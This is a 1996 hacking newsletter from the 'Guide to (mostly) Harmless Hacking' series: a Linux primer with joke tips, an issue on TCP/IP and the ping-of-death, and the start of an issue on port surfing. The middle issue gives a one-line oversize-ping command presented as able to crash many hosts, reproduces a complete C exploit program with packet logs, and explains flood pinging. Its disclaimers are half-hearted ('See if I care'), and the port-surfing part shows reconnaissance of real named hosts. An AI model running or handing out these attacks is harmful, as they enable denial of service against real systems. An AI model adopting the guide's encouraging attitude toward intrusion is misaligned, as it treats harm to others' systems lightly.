Historical note: Linux was created in 1991 by a group led by Linus Torvalds of the University of Helsinki. Linux is copyrighted under the GNU General Public License. Under this agreement, Linux may be redistributed to anyone along with the source code. Anyone can sell any variant of Linux and modify it and repackage it. But even if someone modifies the source code he or she may not claim copyright for anything created from Linux. Anyone who sells a modified version of Linux must provide source code to the buyers and allow them to reuse it in their commercial products without charging licensing fees. This arrangement is known as a "copyleft."
Under this arrangement the original creators of Linux receive no licensing or shareware fees. Linus Torvalds and the many others who have contributed to Linux have done so from the joy of programming and a sense of community with all of us who will hopefully use Linux in the spirit of good guy hacking. Viva Linux! Viva Torvalds!
**********************
Linux consists of the operating system itself (called the "kernel") plus a set of associated programs.
The kernel, like all types of Unix, is a multitasking, multi-user operating system. Although it uses a different file structure, and hence is not directly compatible with DOS and Windows, it is so flexible that many DOS and Windows programs can be run while in Linux. So a power user will probably want to boot up in Linux and then be able to run DOS and Windows programs from Linux.
Associated programs that come with most Linux distributions may include:
* a shell program (Bourne Again Shell -- BASH -- is most common);
* compilers for programming languages such as Fortran-77 (my favorite!), C, C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner), and Smalltalk.;
* X (sometimes called X-windows), a graphical user interface
* utility programs such as the email reader Pine (my favorite) and Elm
Top ten reasons to install Linux on your PC:
1.When Linux is outlawed, only outlaws will own Linux.
2. When installing Linux, it is so much fun to run fdisk without backing up first.
3.The flames you get from asking questions on Linux newsgroups are of a higher quality than the flames you get for posting to alt.sex.bestiality.
4.No matter what flavor of Linux you install, you'll find out tomorrow there was a far more 3l1te ersion you should have gotten instead.
5.People who use Free BSD or Solaris will not make fun of you. They will offer their sympathy instead.
6.At the next Def Con you'll be able to say stuph like "so then I su-ed to his account and grepped all his files for 'kissyface'." Oops, grepping other people's files is a no-no, forget I ever suggested it.
7.Port surf in privacy.
8.One word: exploits.
9.Installing Linux on your office PC is like being a postal worker and bringing an Uzi to work.
10.But - - if you install Linux on your office computer, you boss won't have a clue what that means.
What types of Linux work best? It depends on what you really want. Redhat Linux is famed for being the easiest to install. The Walnut Creek Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is! My approach has been to get lots of Linux versions and mix and match the best from each distribution.
I like the Walnut Creek version best because with my brand X hardware, its autodetection feature was a life-saver.
INSTALLING LINUX is not for the faint of heart! Several tips for surviving installation are:
1) Although you in theory can run Linux on a 286 with 4 MB RAM and two floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a CD-ROM, and at least 200 MB free hard disk space.
2) Know as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card you have. If you have any documentation for these, have them on hand to reference during installation.
3) It works better to use hardware that is name-brand and somewhat out-of-date on your computer. Because Linux is freeware, it doesn't offer device drivers for all the latest hardware. And if your hardware is like mine -- lots of Brand X and El Cheapo stuph, you can take a long time experimenting with what drivers will work.
4) Before beginning installation, back up your hard disk(s)! In theory you can install Linux without harming your DOS/Windows files. But we are all human, especially if following the advice of point 7).
5) Get more than one Linux distribution. The first time I successfully installed Linux, I finally hit on something that worked by using the boot disk from one distribution with the CD-ROM for another. In any case, each Linux distribution had different utility programs, operating system emulators, compilers and more. Add them all to your system and you will be set up to become beyond elite.
6) Buy a book or two or three on Linux. I didn't like any of them! But they are better than nothing. Most books on Linux come with one or two CD-ROMs that can be used to install Linux. But I found that what was in the books did not exactly coincide with what was on the CD-ROMs.
7) I recommend drinking while installing. It may not make debugging go any faster, but at least you won't care how hard it is.
Now I can almost guarantee that even following all these 6 pieces of advice, you will still have problems installing Linux. Oh, do I have 7 advisories up there? Forget number 7. But be of good cheer. Since everyone else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources for the Linux -challenged.
If you are allergic to getting flamed, you can start out with Linux support Web sites.
The best I have found is http://sunsite.unc.edu:/pub/Linux/. It includes the Linux Frequently Asked Questions list (FAQ), available from
sunsite.unc.edu:/pub/Linux/docs/FAQ.
In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a number of other documents about Linux, including the Linux INFO-SHEET and META-FAQ,
The Linux HOWTO archive is on the sunsite.unc.edu Web site at: /pub/Linux/docs/HOWTO. The directory /pub/Linux/docs/LDP contains the current set of LDP manuals.
You can get ``Linux Installation and Getting Started'' from sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file there describes how you can order a printed copy of the book of the same name (about 180 pages).
Now if you don't mind getting flamed, you may want to post questions to the amazing number of Usenet news groups that cover Linux. These include:
comp.os.linux.advocacy Benefits of Linux compared
comp.os.linux.development.system Linux kernels, device drivers
comp.os.linux.x Linux X Window System servers
comp.os.linux.development.apps Writing Linux applications
comp.os.linux.hardware Hardware compatibility
comp.os.linux.setup Linux installation
comp.os.linux.networking Networking and communications
comp.os.linux.answers FAQs, How-To's, READMEs, etc.
linux.redhat.misc
alt.os.linux Use comp.os.linux.* instead
alt.uu.comp.os.linux.questions Usenet University helps you
comp.os.linux.announce Announcements important to Linux
comp.os.linux.misc Linux-specific topics
Want your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available the Linux Support & CD Givaway web site at http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where people donate Linux CD's that they don't need any more. The project was seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CD's when you are done with them. If you live near a computer swap meet, Fry's, Microcenter, or other such place, look for Linux CD's there. They are usually under $20, which is an excellent investment. I personally like the Linux Developer's Resource by Infomagic, which is now up to a seven CD set, I believe, which includes all major Linux distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few)plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more. You should also visit the WONDERFUL linux page at
http://sunsite.unc.edu/linux, which has tons of information, as well as the
http://www.linux.org/. You might also want to check out
http://www.redhat.com/ and http://www.caldera.com/ for more
information on commercial versions of linux (which are still freely available under GNU)."
How about Linux security? Yes, Linux, like every operating system, is imperfect. Eminently hackable, if you really want to know. So if you want to find out how to secure your Linux system, or if you should come across one of the many ISPs that use Linux and want to go exploring (oops, forget I
wrote that), here's where you can go for info:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
http://www.geek-girl.com/bugtraq/
There is also help for Linux users on Internet Relay Chat (IRC). Ben (cyberkid@usa.net)
hosts a channel called #LinuxHelp on the Undernet IRC server.
Last but not least, if you want to ask Linux questions on the Happy Hacker list, you're welcome. We may be the blind leading the blind, but what
the heck!
________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 3
Introduction to TCP/IP. That means packets! Datagrams! Ping oversize packet denial of service exploit explained. But this hack is a lot less mostly harmless than most. Don't try this at home...
____________________________________________________________
If you have been on the Happy Hacker list for awhile, you've been getting some items forwarded from the Bugtraq list on a new ping packet exploit.
Now if this has been sounding like gibberish to you, relax. It is really very simple. In fact, it is so simple that if you use Windows 95, by the time you finish this article you will know a simple, one-line command that you could use to crash many Internet hosts and routers.
*************************************************
YOU CAN GO TO JAIL WARNING: This time I'm not going to implore the wannabe evil genius types on this list to be virtuous and resist the temptation to misuse the information I'm about to give them. See if I care! If one of those guys gets caught crashing thousands of Internet hosts and routers, not only will they go to jail and get a big fine. We'll all think he or she is a dork. This exploit is a no-brainer, one-line command from Windows 95. Yeah, the operating system that is designed for clueless morons. So there is nothing elite about this hack. What is elite is being able to thwart this attack.
**************************************************
**************************************************
NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly your bosom buddies yet, believe me, you need to really get in bed with them in order to call yourself a hacker. So hang in here for some technical stuff. When
we are done, you'll have the satisfaction of knowing you could wreak havoc on the Internet, but are too elite to do so.
A packet is a way to send information electronically that keeps out errors. The idea is that no transmission technology is perfect. Have you ever played the game "telephone"? You get a dozen or so people in a circle and the first person whispers a message to the second. Something like "The bun is the lowest form of wheat." The second person whispers to the third, "A bum is the lowest form of cheating." The third whispers, "Rum is the lowest form of
drinking." And so on. It's really fun to find out how far the message can mutate as it goes around the circle.
But when, for example, you get email, you would prefer that it isn't messed up. So the computer that sends the email breaks it up into little pieces called datagrams. Then it wraps things around each datagram that tell what
computer it needs to go to, where it came from, and that check whether the datagram might have been garbled. These wrapped up datagram packages are called "packets."
Now if the computer sending email to you were to package a really long message into just one packet, chances are pretty high that it will get messed up while on its way to the other computer. Bit burps. So when the receiving computer checks the packet and finds that it got messed up, it
will throw it away and tell the other computer to send it again. It could take a long time until this giant packet gets through intact.
But if the message is broken into a lot of little pieces and wrapped up into bunches of packets, most of them will be good and the receiving computer will keep them. It will then tell the sending computer to retransmit just the packets that messed up. Then when all the pieces finally get there, the receiving computer puts them together in the right order and lo and behold, there is the complete, error-free email.
TCP/IP stands for Transmission Control Protocol/Internet Protocol. It tells computers that are hooked up to the Internet how to package up messages into packets and how to read packets these packets from other computers. Ping uses TCP/IP to make its packets.
**********************************************
"Ping" is a command that sends a feeler out from your computer to another computer to see if it is turned on and hooked to the same network you are on. On the Internet there are some ten million computers that you can ping.
Ping is a command you can give, for example, from the Unix, Windows 95 and Windows NT operating systems. It is part of the Internet Control Message Protocol (ICMP), which is used to troubleshoot TCP/IP networks. What it does is tell a remote computer to echo back a ping. So if you get your ping
back, you know that computer is alive. Furthermore, some forms of the ping command will also tell you how long it takes for a message to go out to that computer and come back again.
But how does your computer know that the ping it just sent out actually echoed back from the targeted computer? The datagram is the answer. The ping sent out a datagram. If the returning ping holds this same datagram, you know it was your ping that just echoed back.
The basic format of this command is simply:
ping hostname
where "hostname" is the Internet address of the computer you want to check out.
When I give this command from Sun Release 4.1 Unix, I get the answer "hostname is alive."
**************************************
TECHNICAL TIP: Because of the destructive powers of ping, many Internet Service Providers hide the ping program in their shell accounts where clueless newbies can't get their hands on it. If your shell account says "command not found" when you enter the ping command, try:
/usr/etc/ping hostname
If this doesn't work, either try the command “whereis ping” or complain to your ISP's tech support. They may have ddiabled ping for ordinary users, but if you convince tech support you are a good Internet citizen they may let you use it.
***************************************
****************************************
NEWBIE NOTE: You say you can't find a way to ping from your on-line service? That may be because you don't have a shell account. But there is one thing you really need in order to hack: A SHELL ACCOUNT!!!!
The reason hackers make fun of people with America Online accounts is because that ISP doesn't give out shell accounts. This is because America Online wants you to be good boys and girls and not hack!
A "shell account" is an Internet account in which your computer becomes a terminal of one of your ISP's host computers. Once you are in the "shell" you can give commands to the operating system (which is usually Unix) just
like you were sitting there at the console of one of your ISP's hosts.
You may already have a shell account but just not know how to log on to it. Call tech support with your ISP to find out whether you have one, and how to get on it.
***************************************
There are all sorts of fancy variations on the ping command. And, guess what, whenever there is a command you give over the Internet that has lots of variations, you can just about count on there being something hackable in there. Muhahaha!
The flood ping is a simple example. If your operating system will let you get away with giving the command:
-> ping -f hostname
it sends out a veritable flood of pings, as fast as your ISP's host machine can make them. This keeps the host you've targeted so busy echoing back your pings that it can do little else. It also puts a heavy load on the network.
Hackers with primitive skill levels will sometimes get together and use several of their computers at once to simultaneously ping some victim's Internet host computer. This will generally keep the victim's computer too
busy to do anything else. It may even crash. However, the down side (from the attackers' viewpoint) is that it keeps the attackers' computers tied up, too.
**************************************
NETIQUETTE NOTE: Flood pinging a computer is extremely rude. Get caught doing this and you will be lucky if the worst that happens is your on-line service provider closes your account. Do this to a serious hacker and you may need an identity transplant.
If you should start a flood ping kind of by accident, you can shut it off by holding down the control key and pressing "c" (control-c).
**************************************
*************************************
EVIL GENIUS TIP: Ping yourself! If you are using some sort of Unix, your operating system will let you use your computer to do just about anything to itself that it can do to other computers. The network address that takes you
back to your own host computer is localhost (or 127.0.0.1). Here's an example of how I use localhost:
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.
SunOS UNIX (slug)
login:
See, I'm back to the login sequence for the computer named "slug" all over
again.
Now I ping myself:
localhost is alive
This gives the same result as if I were to command:
llama.swcp.com is alive
****************************************
*****************************************
MUHAHAHA TIP: Want to yank someone's chain? Tell him to ftp to 127.0.0.1 and log in using his or her own user name and password for kewl warez! My ex-husband Keith Henson did that to the Church of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all their copyrighted scriptures. They
assumed this was on Keith's computer, not theirs. They were *so* sure he had their scriptures that they took him to court. The judge, when he realized they were simply looping back to their own computer, literally laughed them out of court.
For a hilarious transcript or audio tape of this infamous court session, email hkhenson@cup.portal.com. That's Keith's email address. My hat is off to a superb hacker!
*******************************************
However, the oversize ping packet exploit you are about to learn will do even more damage to some hosts than a gang of flood ping conspirators. And it will do it without tying up the attackers' computer for any longer than the split second it takes to send out just one ping.
The easiest way to do this hack is to run Windows 95. Don't have it? You can generally find a El Cheapo store that will sell it to you for $99.
To do this, first set up your Windows 95 system so that you can make a PPP or SLIP connection with the Internet using the Dialup Networking program under the My Computer icon. You may need some help from your ISP tech support in setting this up. You must do it this way or this hack won't work. Your America Online dialer *definitely* will not work.
************************************
NEWBIE NOTE: If your Internet connection allows you to run a Web browser that shows pictures, you can use that dialup number with your Windows 95 Dialup Networking program to get either a PPP or SLIP connection.
************************************
Next, get your connected to the Internet. But don't run a browser or anything. Instead, once your Dialup Networking program tell you that you have a connection, click on the "Start" button and go to the listing "MS-DOS." Open this DOS window. You'll get a prompt:
C:\windows\>
Now let's first do this the good citizen way. At this prompt you can type in a plain ordinary "ping" command:
C:\windows\ping hostname
where "hostname" is the address of some Internet computer. For example, you could ping thales.nmia.com, which is one of my favorite computers, named after an obscure Greek philosopher.
Now if you happened to know the address of one of Saddam Hussein's computers, however, you might want to give the command:
c:\windows\ping -l 65510 saddam_hussein's.computer.mil
Now don't really do this to a real computer! Some, but not all, computers will crash and either remain hung or reboot when they get this ping. Others will continue working cheerily along, and then suddenly go under hours later.
Why? That extra added -l 65510 creates a giant datagram for the ping packet. Some computers, when asked to send back an identical datagram, get really messed up.
If you want all the gory details on this ping exploit, including how to protect your computers from it, check out
http://www.sophist.demon.co.uk/ping.
Now there are other ways to manufacture a giant ping datagram besides using Windows 95. For example, if you run certain FreeBSD or Linux versions of Unix on your PC, you can run this program, which was posted to the Bugtraq list.
From: Bill Fenner
To: Multiple recipients of list BUGTRAQ
Subject: Ping exploit program
Since some people don't necessarily have Windows '95 boxes lying around, I (Fenner) wrote the following exploit program. It requires a raw socket layer that doesn't mess with the packet, so BSD 4.3, SunOS and Solaris are
out. It works fine on 4.4BSD systems. It should work on Linux if you compile with -DREALLY_RAW.
Feel free to do with this what you want. Please use this tool only to test your own machines, and not to crash others'.
* win95ping.c
*
* Simulate the evil win95 "ping -l 65510 buggyhost".
* version 1.0 Bill Fenner
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win95 box looks like:
* 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
* 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
* 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
* 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
* 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
* 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
* 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+
* 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
* 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
* 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
* 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
* 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
* 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
* 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
* 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
* 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
* 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
* 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
* 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
* 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
* 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
* 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
* 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
* 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
* 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
* 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
* 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
* 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
* 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
* 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
* 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
* 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
* 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
* 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
* 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
* 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
* 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
* 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
* 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
* 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
* 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
* 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
* 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
* 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
* 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
/*
* If your kernel doesn't muck with raw packets, #define REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[1500];
struct ip *ip = (struct ip *)buf;
struct icmp *icmp = (struct icmp *)(ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = 1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(1);
}
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}
(End of Fenner's ping exploit message.)
********************************************
YOU CAN GO TO JAIL NOTE: Not only is this hack not elite, if you are reading this you don't know enough to keep from getting busted from doing this ping hack. On the other hand, if you were to do it to an Internet host in Iraq...
********************************************
Of course there are many other kewl things you can do with ping. If you have a shell account, you can find out lots of stuph about ping by giving the command:
man ping
In fact, you can get lots of details on any Unix command with "man."
Have fun with ping -- and be good! But remember, I'm not begging the evil genius wannabes to be good. See if I care when you get busted...
_________________________________________________________
To subscribe, email hacker@techbroker.com with message “subscribe hh.” To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 4
More intro to TCP/IP: port surfing! Daemons! How to get on almost any computer without logging in and without breaking the law. Impress your clueless friends and actually discover kewl, legal, safe stuph.
____________________________________________________________
A few days ago I had a lady friend visiting. She’s 42 and doesn’t own a computer. However, she is taking a class on personal computers at a community college. She wanted to know what all this hacking stuph is about. So I decided to introduce her to port surfing. And while doing it, we stumbled across something kewl.
Port surfing takes advantage of the structure of TCP/IP. This is the protocol (set of rules) used for computers to talk to each other over the Internet. One of the basic principles of Unix (the most popular operating system on the Internet) is to assign a “port” to every function that one computer might command another to perform. Common examples are to send and receive email, read Usenet newsgroups, telnet, transfer files, and offer Web pages.
************************
Newbie note #1: A computer port is a place where information goes in or out of it. On your home computer, examples of ports are your monitor, which sends information out, your keyboard and mouse, which send information in, and your modem, which sends information both out and in.
But an Internet host computer such as callisto.unm.edu has many more ports than a typical home computer. These ports are identified by numbers. Now these are not all physical ports, like a keyboard or RS232 serial port (for your modem). They are virtual (software) ports.
A “service” is a program running on a “port.” When you telnet to a port, that program is up and running, just waiting for your input. Happy hacking!
************************
So if you want to read a Web page, your browser contacts port number 80 and tells the computer that manages that Web site to let you in. And, sure enough, you get into that Web server computer without a password.
OK, big deal. That’s pretty standard for the Internet. Many -- most -- computers on the Internet will let you do some things with them without needing a password,
However, the essence of hacking is doing things that aren’t obvious. That don’t just jump out at you from the manuals. One way you can move a step up from the run of the mill computer user is to learn how to port surf.
The essence of port surfing is to pick out a target computer and explore it to see what ports are open and what you can do with them.
Now if you are a lazy hacker you can use canned hacker tools such as Satan or Netcat. These are programs you can run from Linux, FreeBSD or Solaris (all types of Unix) from your PC. They automatically scan your target computers. They will tell you what ports are in use. They will also probe these ports for presence of daemons with know security flaws, and tell you what they are.
********************************
Newbie note # 2: A daemon is not some sort of grinch or gremlin or 666 guy. It is a program that runs in the background on many (but not all) Unix system ports. It waits for you to come along and use it. If you find a daemon on a port, it’s probably hackable. Some hacker tools will tell you what the hackable features are of the daemons they detect.
********************************
However, there are several reasons to surf ports by hand instead of automatically.
1) You will learn something. Probing manually you get a gut feel for how the daemon running on that port behaves. It’s the difference between watching an x-rated movie and (blush).
2) You can impress your friends. If you run a canned hacker tool like Satan your friends will look at you and say, “Big deal. I can run programs, too.” They will immediately catch on to the dirty little secret of the hacker world. Most hacking exploits are just lamerz running programs they picked up from some BBS or ftp site. But if you enter commands keystroke by keystroke they will see you using your brain. And you can help them play with daemons, too, and give them a giant rush.
3) The truly elite hackers surf ports and play with daemons by hand because it is the only way to discover something new. There are only a few hundred hackers -- at most -- who discover new stuph. The rest just run canned exploits over and over and over again. Boring. But I am teaching you how to reach the pinnacle of hackerdom.
Now let me tell you what my middle aged friend and I discovered just messing around. First, we decided we didn’t want to waste our time messing with some minor little host computer. Hey, let’s go for the big time!
So how do you find a big kahuna computer on the Internet? We started with a domain which consisted of a LAN of PCs running Linux that I happened to already know about, that is used by the New Mexico Internet Access ISP: nmia.com.
*****************************
Newbie Note # 3: A domain is an Internet address. You can use it to look up who runs the computers used by the domain, and also to look up how that domain is connected to the rest of the Internet.
*****************************
So to do this we first logged into my shell account with Southwest Cyberport. I gave the command:
New Mexico Internet Access (NMIA-DOM)
2201 Buena Vista SE
Albuquerque, NM 87106
Domain Name: NMIA.COM
Administrative Contact, Technical Contact, Zone Contact:
Orrell, Stan (SO11) SAO@NMIA.COM
(505) 877-0617
Record last updated on 11-Mar-94.
Record created on 11-Mar-94.
Domain servers in listed order:
NS.NMIA.COM 198.59.166.10
GRANDE.NM.ORG 129.121.1.2
Now it’s a good bet that grande.nm.org is serving a lot of other Internet hosts beside nmia.com. Here’s how we port surf our way to find this out:
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1
Product License Authorization Expiration Date
---------- ------- ------------- ---------------
MULTINET Yes A-137-1641 (none)
NFS-CLIENT Yes A-137-113237 (none)
*** Configuration for file "MULTINET:NETWORK_DEVICES.CONFIGURATION" ***
Device Adapter CSR Address Flags/Vector
------ ------- ----------- ------------
se0 (Shared VMS Ethernet/FDDI) -NONE- -NONE- -NONE-
MultiNet Active Connections, including servers:
Proto Rcv-Q Snd-Q Local Address (Port) Foreign Address (Port) State
----- ----- ----- ------------------ ------------------ -----
TCP 0 822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(POP3) 164.64.201.67(1256) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4918) 129.121.254.5(TELNET) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(TELNET) AVATAR.NM.ORG(3141) ESTABLISHED
TCP 0 0 *(NAMESERVICE) *(*) LISTEN
TCP 0 0 *(TELNET) *(*) LISTEN
TCP 0 0 *(FTP) *(*) LISTEN
TCP 0 0 *(FINGER) *(*) LISTEN
TCP 0 0 *(NETSTAT) *(*) LISTEN
TCP 0 0 *(SMTP) *(*) LISTEN
TCP 0 0 *(LOGIN) *(*) LISTEN
TCP 0 0 *(SHELL) *(*) LISTEN
TCP 0 0 *(EXEC) *(*) LISTEN
TCP 0 0 *(RPC) *(*) LISTEN
TCP 0 0 *(NETCONTROL) *(*) LISTEN
TCP 0 0 *(SYSTAT) *(*) LISTEN
TCP 0 0 *(CHARGEN) *(*) LISTEN
TCP 0 0 *(DAYTIME) *(*) LISTEN
TCP 0 0 *(TIME) *(*) LISTEN
TCP 0 0 *(ECHO) *(*) LISTEN
TCP 0 0 *(DISCARD) *(*) LISTEN
TCP 0 0 *(PRINTER) *(*) LISTEN
TCP 0 0 *(POP2) *(*) LISTEN
TCP 0 0 *(POP3) *(*) LISTEN
TCP 0 0 *(KERBEROS_MASTER) *(*) LISTEN
TCP 0 0 *(KLOGIN) *(*) LISTEN
TCP 0 0 *(KSHELL) *(*) LISTEN
TCP 0 0 GRANDE.NM.ORG(4174) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4172) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4171) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 *(FS) *(*) LISTEN
UDP 0 0 *(NAMESERVICE) *(*)
UDP 0 0 127.0.0.1(NAMESERVICE) *(*)
UDP 0 0 GRANDE.NM.OR(NAMESERV) *(*)
UDP 0 0 *(TFTP) *(*)
UDP 0 0 *(BOOTPS) *(*)
UDP 0 0 *(KERBEROS) *(*)
UDP 0 0 127.0.0.1(KERBEROS) *(*)
UDP 0 0 GRANDE.NM.OR(KERBEROS) *(*)
UDP 0 0 *(*) *(*)
UDP 0 0 *(SNMP) *(*)
UDP 0 0 *(RPC) *(*)
UDP 0 0 *(DAYTIME) *(*)
UDP 0 0 *(ECHO) *(*)
UDP 0 0 *(DISCARD) *(*)
UDP 0 0 *(TIME) *(*)
UDP 0 0 *(CHARGEN) *(*)
UDP 0 0 *(TALK) *(*)
UDP 0 0 *(NTALK) *(*)
UDP 0 0 *(1023) *(*)
UDP 0 0 *(XDMCP) *(*)
MultiNet registered RPC programs:
Program Version Protocol Port
------- ------- -------- ----
PORTMAP 2 TCP 111
PORTMAP 2 UDP 111
MultiNet IP Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
198.59.167.1 LAWRII.NM.ORG Up,Gateway,H 0 2 se0 1500
166.45.0.1 ENSS365.NM.ORG Up,Gateway,H 0 4162 se0 1500
205.138.138.1 ENSS365.NM.ORG Up,Gateway,H 0 71 se0 1500
204.127.160.1 ENSS365.NM.ORG Up,Gateway,H 0 298 se0 1500
127.0.0.1 127.0.0.1 Up,Host 5 1183513 lo0 4136
198.59.167.2 LAWRII.NM.ORG Up,Gateway,H 0 640 se0 1500
192.132.89.2 ENSS365.NM.ORG Up,Gateway,H 0 729 se0 1500
207.77.56.2 ENSS365.NM.ORG Up,Gateway,H 0 5 se0 1500
204.97.213.2 ENSS365.NM.ORG Up,Gateway,H 0 2641 se0 1500
194.90.74.66 ENSS365.NM.ORG Up,Gateway,H 0 1 se0 1500
